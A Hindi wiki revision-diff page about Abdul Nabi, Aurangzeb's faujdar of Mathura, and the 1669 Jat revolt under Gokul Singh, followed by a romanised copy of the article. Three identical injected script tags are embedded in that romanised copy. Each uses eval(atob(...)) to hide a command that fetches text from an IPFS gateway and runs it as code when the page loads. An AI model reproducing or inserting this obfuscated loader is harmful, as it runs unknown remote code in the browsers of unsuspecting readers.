Difference between revisions of "अब्दुलनवी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "फौज" to "फ़ौज")
Line 4: Line 4:
  
 
औरंगजेब के दमन के कारण अनेक स्थानों के हिन्दुओं ने विरोध किया, किंतु उसकी भंयकर लपट ब्रज में दिखलाई दी थी। [[महावन]] के निकट की ग्रामीण जनता से सन 1669 में [[गोकुल सिंह]] जाट के नेतृत्व में विद्रोह कर दिया। औरंगजेब के अत्याचारों के विरुद्ध हिन्दुओं का वह प्रथम संगठित संघर्ष था। मथुरा का फ़ौजदार अब्दुलनबी एक बड़ी सेना लेकर विद्रोहियों को दंड देने के लिए गया। [[महावन]] परगना के [[सिहोरा]] गाँव में उसकी विद्रोहियों से मुठभेड़ हुई जिसमें अब्दुलनवी मारा गया और मु्ग़ल सेना बुरी तरह हार गई। उसके बाद विद्रोहियों ने [[सादाबाद]] के समृद्धिशाली इलाके को लूटा और फिर [[आगरा]] तक लूटमार करते रहे।  
 
औरंगजेब के दमन के कारण अनेक स्थानों के हिन्दुओं ने विरोध किया, किंतु उसकी भंयकर लपट ब्रज में दिखलाई दी थी। [[महावन]] के निकट की ग्रामीण जनता से सन 1669 में [[गोकुल सिंह]] जाट के नेतृत्व में विद्रोह कर दिया। औरंगजेब के अत्याचारों के विरुद्ध हिन्दुओं का वह प्रथम संगठित संघर्ष था। मथुरा का फ़ौजदार अब्दुलनबी एक बड़ी सेना लेकर विद्रोहियों को दंड देने के लिए गया। [[महावन]] परगना के [[सिहोरा]] गाँव में उसकी विद्रोहियों से मुठभेड़ हुई जिसमें अब्दुलनवी मारा गया और मु्ग़ल सेना बुरी तरह हार गई। उसके बाद विद्रोहियों ने [[सादाबाद]] के समृद्धिशाली इलाके को लूटा और फिर [[आगरा]] तक लूटमार करते रहे।  
 
+
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{मुग़ल साम्राज्य}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:मुग़ल साम्राज्य]]
 
[[Category:मुग़ल साम्राज्य]]
 
__INDEX__
 
__INDEX__

Revision as of 12:11, 27 April 2011

aurangajeb ki or se mathura ka faujadar abdulanavi namak ek kattar musalaman tha. vah san 1660 se san 1669 tak mathura ka faujadar raha tha. usane braj ke hinduoan ko zabardasti musalaman banane ka prayatn kiya tha aur unake mandir−devalayoan ko nasht karane ki cheshta ki thi. usase braj ke hinduoan ne vidroh kar diya tha .

braj mean vidroh

aurangajeb ke daman ke karan anek sthanoan ke hinduoan ne virodh kiya, kiantu usaki bhanyakar lapat braj mean dikhalaee di thi. mahavan ke nikat ki gramin janata se san 1669 mean gokul sianh jat ke netritv mean vidroh kar diya. aurangajeb ke atyacharoan ke viruddh hinduoan ka vah pratham sangathit sangharsh tha. mathura ka faujadar abdulanabi ek b di sena lekar vidrohiyoan ko dand dene ke lie gaya. mahavan paragana ke sihora gaanv mean usaki vidrohiyoan se muthabhe d huee jisamean abdulanavi mara gaya aur muhgal sena buri tarah har gee. usake bad vidrohiyoan ne sadabad ke samriddhishali ilake ko loota aur phir agara tak lootamar karate rahe. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>